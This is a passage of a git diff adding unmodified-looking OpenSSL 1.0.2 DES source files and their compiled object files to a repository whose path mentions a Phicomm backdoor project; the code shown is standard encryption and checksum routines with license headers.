zcmbuA-ESL35Wv^58{4#;&Bud93%W`Na#U*BBtSqV@;Z0P1sw#Dq(vg-a2zLrHXm{>
z(9o(>GNN7?w|(IO@yx$al_F3Ak*HKPBsG*59!x7jJ}MEY)Q^<*m^tsJ;p*~0N7~!j
z-_Gpp$L!vRn$cG0@em;%(n9XE1SKR8xT7Z>HAzB5B3D9BtkFGmH|?R_JzaYKvaYj3
zO4wkk66x2Az9*w#tV63gF_m9ShK`$cgmkbg>?fVgzQTUUugQlWqxo4II<1D%%N6<!
zhVLjZP<wVIVm(5?#x|SR5?4FQzft?#iXT*(KWCRT|Ccx`tvKk@ilNVRW+{PdH&oWI
zG(kXF&mU3(By?;62GEO^646VCl=x{J&S1StRAq(|$B*K;ECMG*@GBbNTkKWBYO!01
z+h<gOO)5}D_nggN_Z!d`4ITXy%=OYs=%r_TM|IEj7P}HU*=6hYS$1K1A+l1JxEeay
zitXu2IJnBb1#*6!1cGzWp5h*&anLdUJ;K&je2FPEA9u(?m|YA0>@b_VOkWJJ3&GnC
zgFsH;;9pfYn5mjL-%)DXtR|*(SZx?4Evws?)$OaLgLdBbzu#??9>>XdWOjYk;knsD
z?Mv)?-JYHPBa$q%a5W5SVE|?@TWG^Cn?sAmNTHr<;X-}kJ*R&+evQ&LDSu10_U3OT
z@gpCOmU=3uk`PB_<%UHzPs^9tboml0%WRqkf1%}y2CHv8ErStTQdy;8nU<H>e7VAw
z(0X1Co}uN78k^IC70PB-0-&yVHTI*%e${P5f%eRjblbKy7Sh<DPlp3*?$;Zu$!BeH
zPFBy)=x^?&y>u^qi<;j-toxJp*47v0Xiwk7h&3U<5NnLZcP5^naGHt3&%|T#riLo6
zhVelahO!At`>Q<!Zow2XFBFtVs}=El@H+7v2z$0}@dr*osv5wz@xD{wMB1eA@w${0
zIp$4Ca><vHqMvM{QvBn3DmCZ*s&vHT{k%?U21KPOn1E?Y3a2EzDgPmOD}3ZnyOxQ!
z=8J%H7qkDjmlsB=C0=LsclUTn?a6sb@NQ!uUh=>_xc@G`8OXyM=I`twu&q$=Jlv81
zP>Z+RgOkyLJ~KO#iDihYb(y@Cn;f%<*=}^Es9|=twRLITW;ab4n(0`9Jz6A)X^vaz
z%sw+Sw9gz!zq6l^vwT9hgIl2dZC6D+(U=05LxMZ6CA0+>x$*@95FF=0D8e2Y3U*`p
z2oD}aoS5Ji=i+1p@8=xnh9dYIoQu5^ypwa0--5St9;ptqKF+h8i**S59h}Q9`yd*C
zDAj6x96#q#7x!@fw2R;5<Hue62IoyKevR{H7hmOkmy0iPF1t8y5)vDq9JbPZP+Pfb
zJtVYTc7Hl%We->+)}OZ0B-S@RPGSztjaEr!ba*&B0tO?aRyGC?%uXk<czbYUA~u#A
z9n0pdN$!{(G6!<$;p}?+`&4A`$0gRg#!2$FxObwPZ-;0)_Yre2xlXFe2~2j7x1DeG
zPN1*IOOZcM0YmP7k*@Re=I-m2J3i(Ej`@H6p95bU(;ZI4PeR{D5%*0ne0OTCf0eKQ
z2%j+CJ4EjF<NJgrB7Z@3q?s>hhXA}5>lbx9aG`HB&A2zj<u7dafP$~Dd;LS)UlxYE
z7V{T)6cmi__AhY%Az{dCxBt7qYwh0{|0Re#!TrO(hwvA?R%{Hl%HzMrHwWL+TK@Q_
fs<l-~etw-e*amU$^+V8C%fG<qKe@pdRk!~?72nTp

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/options.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/options.txt
new file mode 100644
index 0000000..6e2b50f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/options.txt
@@ -0,0 +1,39 @@
+Note that the UNROLL option makes the 'inner' des loop unroll all 16 rounds
+instead of the default 4.
+RISC1 and RISC2 are 2 alternatives for the inner loop and
+PTR means to use pointers arithmatic instead of arrays.
+
+FreeBSD - Pentium Pro 200mhz - gcc 2.7.2.2 - assembler		577,000 4620k/s
+IRIX 6.2 - R10000 195mhz - cc (-O3 -n32) - UNROLL RISC2 PTR	496,000 3968k/s
+solaris 2.5.1 usparc 167mhz?? - SC4.0 - UNROLL RISC1 PTR [1]	459,400 3672k/s
+FreeBSD - Pentium Pro 200mhz - gcc 2.7.2.2 - UNROLL RISC1	433,000 3468k/s
+solaris 2.5.1 usparc 167mhz?? - gcc 2.7.2 - UNROLL 		380,000 3041k/s
+linux - pentium 100mhz - gcc 2.7.0 - assembler			281,000 2250k/s
+NT 4.0 - pentium 100mhz - VC 4.2 - assembler			281,000 2250k/s
+AIX 4.1? - PPC604 100mhz - cc - UNROLL 				275,000 2200k/s
+IRIX 5.3 - R4400 200mhz - gcc 2.6.3 - UNROLL RISC2 PTR		235,300 1882k/s
+IRIX 5.3 - R4400 200mhz - cc - UNROLL RISC2 PTR			233,700 1869k/s
+NT 4.0 - pentium 100mhz - VC 4.2 - UNROLL RISC1 PTR		191,000 1528k/s
+DEC Alpha 165mhz??  - cc - RISC2 PTR [2]			181,000 1448k/s
+linux - pentium 100mhz - gcc 2.7.0 - UNROLL RISC1 PTR		158,500 1268k/s
+HPUX 10 - 9000/887 - cc - UNROLL [3]	 			148,000	1190k/s
+solaris 2.5.1 - sparc 10 50mhz - gcc 2.7.2 - UNROLL		123,600  989k/s
+IRIX 5.3 - R4000 100mhz - cc - UNROLL RISC2 PTR			101,000  808k/s
+DGUX - 88100 50mhz(?) - gcc 2.6.3 - UNROLL			 81,000  648k/s
+solaris 2.4 486 50mhz - gcc 2.6.3 - assembler			 65,000  522k/s
+HPUX 10 - 9000/887 - k&r cc (default compiler) - UNROLL PTR	 76,000	 608k/s
+solaris 2.4 486 50mhz - gcc 2.6.3 - UNROLL RISC2		 43,500  344k/s
+AIX - old slow one :-) - cc -					 39,000  312k/s
+
+Notes.
+[1] For the ultra sparc, SunC 4.0 
+    cc -xtarget=ultra -xarch=v8plus -Xa -xO5, running 'des_opts'
+    gives a speed of 344,000 des/s while 'speed' gives 459,000 des/s.
+    I'll record the higher since it is coming from the library but it
+    is all rather weird.
+[2] Similar to the ultra sparc ([1]), 181,000 for 'des_opts' vs 175,000.
+[3] I was unable to get access to this machine when it was not heavily loaded.
+    As such, my timing program was never able to get more that %30 of the CPU.
+    This would cause the program to give much lower speed numbers because
+    it would be 'fighting' to stay in the cache with the other CPU burning
+    processes.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.c
new file mode 100644
index 0000000..144d5ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.c
@@ -0,0 +1,115 @@
+/* crypto/des/pcbc_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+void DES_pcbc_encrypt(const unsigned char *input, unsigned char *output,
+                      long length, DES_key_schedule *schedule,
+                      DES_cblock *ivec, int enc)
+{
+    register DES_LONG sin0, sin1, xor0, xor1, tout0, tout1;
+    DES_LONG tin[2];
+    const unsigned char *in;
+    unsigned char *out, *iv;
+
+    in = input;
+    out = output;
+    iv = &(*ivec)[0];
+
+    if (enc) {
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        for (; length > 0; length -= 8) {
+            if (length >= 8) {
+                c2l(in, sin0);
+                c2l(in, sin1);
+            } else
+                c2ln(in, sin0, sin1, length);
+            tin[0] = sin0 ^ xor0;
+            tin[1] = sin1 ^ xor1;
+            DES_encrypt1((DES_LONG *)tin, schedule, DES_ENCRYPT);
+            tout0 = tin[0];
+            tout1 = tin[1];
+            xor0 = sin0 ^ tout0;
+            xor1 = sin1 ^ tout1;
+            l2c(tout0, out);
+            l2c(tout1, out);
+        }
+    } else {
+        c2l(iv, xor0);
+        c2l(iv, xor1);
+        for (; length > 0; length -= 8) {
+            c2l(in, sin0);
+            c2l(in, sin1);
+            tin[0] = sin0;
+            tin[1] = sin1;
+            DES_encrypt1((DES_LONG *)tin, schedule, DES_DECRYPT);
+            tout0 = tin[0] ^ xor0;
+            tout1 = tin[1] ^ xor1;
+            if (length >= 8) {
+                l2c(tout0, out);
+                l2c(tout1, out);
+            } else
+                l2cn(tout0, tout1, out, length);
+            xor0 = tout0 ^ sin0;
+            xor1 = tout1 ^ sin1;
+        }
+    }
+    tin[0] = tin[1] = 0;
+    sin0 = sin1 = xor0 = xor1 = tout0 = tout1 = 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/pcbc_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..1e3d638538e2d03375794cf95a2a71cbc875e576
GIT binary patch
literal 2832
zcmbtV-D@0G6u+C@G`l6vP9+Zmt+L=&R%*wL5seBVvzf_GaA~5OZAGoq&17q|O|tAx
zFcC=~*2oO&rV$jyKfp(QE7hlLD{WG0F#!d^mqw5#v7!x##x&zOGxsLzbn~Dd816a0
z^Lfub_s%&r-P;rh5JmygMRp~I5;D-T%XhnMH;EFCY(yX2luz{8j(l9s_Ss*{gIUe~
zHlx`aTKVUMT8XKZLTFg4gbpXbOS6@@AkC{Yi_v!~kS1Mi##q|S?da?eAZz8jEz`VO
ziOQA!P+$3Kcy$KUebvxoS~a^Jy`VW-d9(RVqt9rYO9w7>IV-iByyh&}*Vdb)WmoSk
z)NY0&OCT>sFAO-KWI_Rj+E2oINLrMBr^?z2ANkIQgd=xcWLd$8>FT5-N0wCSx-8xJ
z5_^-jf6=OM$9X#)4{PPi@ZAn8Ahas>aGY0cGv0O!w^dQ%Z56Po3<3&Ft5makwyew_
zva}@IH|!;=^k;2NsIBs<ecj6ZWnZ$4yR|jGc1y6H+q5#<R*$p#{kG#kL)1ztBrUsX
zAw9MRGeR;qEhJK)wP81{(t%ZUKo!_d1*!<U*|q9@Sk?3)#eN9OR_xLi>`Ilc;0E9f
z&V980682fEhK{&>PHINm`&!@{^jWd*VE5K|3vzA%YjrA?+fl_{aWw*JJk~Y(ks6(H
zwCan_`iB}6A`ELC-XxgKZmnARtHjGE<yYjB@~g6b8SDF(l<MhuCYHz!O^lfnv8Tlj
zvHhs@)PyTa(~q}{?N2=7!Cu@DEIfQTcd27p(nQESVnO(j+PsAX-g<!qCi%d@)|T)b
zPAcGssO}gzkzS5J-=uQFY%s~isv(t2yw@yq?eFeWxXyA*iaQlN+{ASPB6A6_NOD4w
z<C9#N#@K7Y`3jNWoJRU!!<&h<v+Dop6@*BQDCq9~UQLiRt}aL-_ZkBdB>VTk>mCbg
z(F*JRb@jVF1ndF$@I3s~0YD?Xdk>rxj3GnMj~Svt6g8tWu{c#QiJnULC*`!>-`kr}
z2lYWYnO1ez3>?rxBD!8ObH*9n7&)V#&b@w?)gw~|j~r)a%kfCSg95@1<K7s4eh>UJ
zinBOu&Ynd82;<=OWN{EfLN$I@Q2=5m%J45dc<1C8{yD|5HYA3B>WMqOW%wr)XLT|B
z1BwfDWw?M05W5o$KS1%AtKH4JpW<;J-a_$&4-ZoOQ6IiV`xx`#R3t<!O^uqlAz00#
zw~jEbm_M5n&HSWE#NnKoBjQl0L_`-Yj(dnPK02Bo1B0<~GcUpeanv0PD!(>1Ar^|`
zg?!PRqK^3y{d6%mn%~L)KbaW#;}-Y%;&fA)-5aK+?O-A~2prBx_YUGQF&ti?NpEpy
z7Jb=`XXpDcV2Jx)lv#Qn)O~01=g0HHnE%!PN$|y({&aH`Xa`+AvHQR<37AIv|CsJS
zMhnJ!fslXyU4Ws9KhHePe*|>(#P-kD6et;AZ@2E>5LNnZPXLaur{DZn3dE=%TUh-}
z9tQ?v`u%x&AS29>u73YF0B_X4i*z8_oM8X(^=JMJZ<HHTP15`Wbi?@8HS)(ljemB~
de}NwK^C;Ajzkdfn*U0}HTK`m?FS36BzX68MmcRf2

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.c
new file mode 100644
index 0000000..2a168a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.c
@@ -0,0 +1,143 @@
+/* crypto/des/qud_cksm.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * From "Message Authentication" R.R. Jueneman, S.M. Matyas, C.H. Meyer IEEE
+ * Communications Magazine Sept 1985 Vol. 23 No. 9 p 29-40 This module in
+ * only based on the code in this paper and is almost definitely not the same
+ * as the MIT implementation.
+ */
+#include "des_locl.h"
+
+/* bug fix for dos - 7/6/91 - Larry hughes@logos.ucs.indiana.edu */
+#define Q_B0(a) (((DES_LONG)(a)))
+#define Q_B1(a) (((DES_LONG)(a))<<8)
+#define Q_B2(a) (((DES_LONG)(a))<<16)
+#define Q_B3(a) (((DES_LONG)(a))<<24)
+
+/* used to scramble things a bit */
+/* Got the value MIT uses via brute force :-) 2/10/90 eay */
+#define NOISE   ((DES_LONG)83653421L)
+
+DES_LONG DES_quad_cksum(const unsigned char *input, DES_cblock output[],
+                        long length, int out_count, DES_cblock *seed)
+{
+    DES_LONG z0, z1, t0, t1;
+    int i;
+    long l;
+    const unsigned char *cp;
+#ifdef _CRAY
+    struct lp_st {
+        int a:32;
+        int b:32;
+    } *lp;
+#else
+    DES_LONG *lp;
+#endif
+
+    if (out_count < 1)
+        out_count = 1;
+#ifdef _CRAY
+    lp = (struct lp_st *)&(output[0])[0];
+#else
+    lp = (DES_LONG *)&(output[0])[0];
+#endif
+
+    z0 = Q_B0((*seed)[0]) | Q_B1((*seed)[1]) | Q_B2((*seed)[2]) |
+        Q_B3((*seed)[3]);
+    z1 = Q_B0((*seed)[4]) | Q_B1((*seed)[5]) | Q_B2((*seed)[6]) |
+        Q_B3((*seed)[7]);
+
+    for (i = 0; ((i < 4) && (i < out_count)); i++) {
+        cp = input;
+        l = length;
+        while (l > 0) {
+            if (l > 1) {
+                t0 = (DES_LONG)(*(cp++));
+                t0 |= (DES_LONG)Q_B1(*(cp++));
+                l--;
+            } else
+                t0 = (DES_LONG)(*(cp++));
+            l--;
+            /* add */
+            t0 += z0;
+            t0 &= 0xffffffffL;
+            t1 = z1;
+            /* square, well sort of square */
+            z0 = ((((t0 * t0) & 0xffffffffL) + ((t1 * t1) & 0xffffffffL))
+                  & 0xffffffffL) % 0x7fffffffL;
+            z1 = ((t0 * ((t1 + NOISE) & 0xffffffffL)) & 0xffffffffL) %
+                0x7fffffffL;
+        }
+        if (lp != NULL) {
+            /*
+             * The MIT library assumes that the checksum is composed of
+             * 2*out_count 32 bit ints
+             */
+#ifdef _CRAY
+            (*lp).a = z0;
+            (*lp).b = z1;
+            lp++;
+#else
+            *lp++ = z0;
+            *lp++ = z1;
+#endif
+        }
+    }
+    return (z0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/qud_cksm.o
new file mode 100644
index 0000000000000000000000000000000000000000..a97328233fd9c41fe30baf4d431ed4fcedcbe321
GIT binary patch
literal 1560
zcmbtT(MuFz5TD&W^U7=Qil75SuBVLh<1C}>A#Qa~Z$TxpgP=s#b5pQ8^>!Du2PKY+
zHWPZR|DmX->Y)cQjC?aBsQ;k2f+8pqW1Da9`_8@Xe5rw9W_~ljZ)WHFb}>EBCkg^^
z5#R#sL>vW(OFMqbb5jt37Wf`*+fuUS^%s<+Ia|u*=+GO@d8@p1U3W3t`DHl06wf%D
z>7~igV0nFENQpiZwbC!a+OI^Pi<-Nxl~%=yq`9l<<&dO09}!ZWRVDgl4Ru4<$UM}3
zZY#^>4s$z%$co}@Rw3tI<#DF`!)j5TwoK`DSak~9?po=$v>56Bv=GK&H0ML*?p4)!
zKcZYyMqWXGZ}0g;dv?q&SazbDoF>VR&a<``b}pPsl4RHMDhv?9&xxTnq4p1DK?GQ#
z7+=F7^r;9pFM%)@6Ivt9;rqCQF2s&_8GuLB_Q|njaX^mWlLqC)?NG1WUTP9=$q7}C
z_sFpxIn0W8F?6jV_~tfBOAT*|&WO`C5UDnOeNytivL2(61bhAlJ-m4roNlOIA{ZX@
z&FSrgmdx7Yqq!+FPjaB9heu~^-HYvfm7k~@?@Q{whM4ntOCJMbTE(iJ<ep{BSwO~h
zO9wJ$nm}^X`Mgm;tT1gE1h28fwDjB*izf;;nJG@s7)5IyNYS{V6Jv7pdQs0CtoeVK
zR^-yV3vMvQ&aCZ$#kAHhM=_une{VeZnL7a+<R8O4eOmv@KZ#s=W)jsey#EP5h(7Pn
z?HM2DFFni){9uFHG-C9X)!jYDamG)e@0Z|jG=fQ58swj2{EL1v`a%8`#OP~Iq59<k
zJ21|`y=dv2oX_z_y(#4m>;IJoDEm<989_e9f_H}y%(4FTeffnQTZ0au*NFd=@h57P
IRVT>*17mKaJOBUy

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.c
new file mode 100644
index 0000000..b75cc5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.c
@@ -0,0 +1,67 @@
+/* crypto/des/rand_key.c */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/des.h>
+#include <openssl/rand.h>
+
+int DES_random_key(DES_cblock *ret)
+{
+    do {
+        if (RAND_bytes((unsigned char *)ret, sizeof(DES_cblock)) != 1)
+            return (0);
+    } while (DES_is_weak_key(ret));
+    DES_set_odd_parity(ret);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/rand_key.o
new file mode 100644
index 0000000000000000000000000000000000000000..e0d8620f251d59daa8bbbf4ff8d06a1c6cef25c9
GIT binary patch
literal 1744
zcmbtTPiqrV5TDIf8#P^{hy*IK2N6ZPBr1qSB%9_R5?XDOOR=n*WVI#DANCJ69uyIU
zfQNn%4}Jm(=m+o{=)r^FLBxxQQfGGGq}ye4(Sh0d&F{UL_ukCx(^9RRkR)J{;1=wA
z%mVDn`#A5zJj_7~ejGphORqPoqd#}wCXug>zI~x(ef0kMPsuyY{)@5qk?~i#l>1y9
zeOlkp@4bV{($b=Oq0#huuBYD6u4>tZ+;z`)b5E{hwd}Qv0qvhUgWojjA=Jup0}=pZ
z;`n-}5R*ucS3%lIOY^DO<Sstw9CBy;6}%hSvXXw4(3Q+fxu~eNlF^lPL7^AK3)N%>
zzVF4Y%CQxrJMpa!M#-2dPGmS7M`M=RDSZ5WWxqNHLsICT4BgYO0dn)GRL`j7kci`N
zPT^})c(Bc0+vr$Btp&x>nn7;AO9U8|+DbvM87t-TTB&Z-^+K&=z^cAnG@3)#a{T>U
zj`7GcJAMGgJC<wo+ihcD+FR}rfcs4qJ%;*wFA(ZC3GwuH=Ceei5I={?yo#6v=gC*!
zp^xSayRO+p>)L_cWMo_0rsi5ZE@*AjH9>1S4rr}@w`=u~>-Akr!x>$0T(i{?{==T9
z4eb8FvhntspTXKR9@u8rnjHB*K*eC1)#xPUkt5;02VSt3F<F`is!bj>EMqDRN;NQW
z6fK>@6POYFdBH~~|Cv~i8p;ut%ji(fe~qWPrJUSngud|kmzWTi&u6=cJmc`z*I_4w
zqkC`T8vU)JT$7z|1X3qV0JwfkHxW?IX#5AUAulYOX#55)#Pu&J3d((={!uK)Gaq+0
sos||3y(29BYe!<@iHr6QDY!2lWRMdQk#54AKol3R3UYh0GXT-}zm55vY5)KL

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.c
new file mode 100644
index 0000000..01e275f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/read2pwd.c
@@ -0,0 +1,140 @@
+/* crypto/des/read2pwd.c */
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
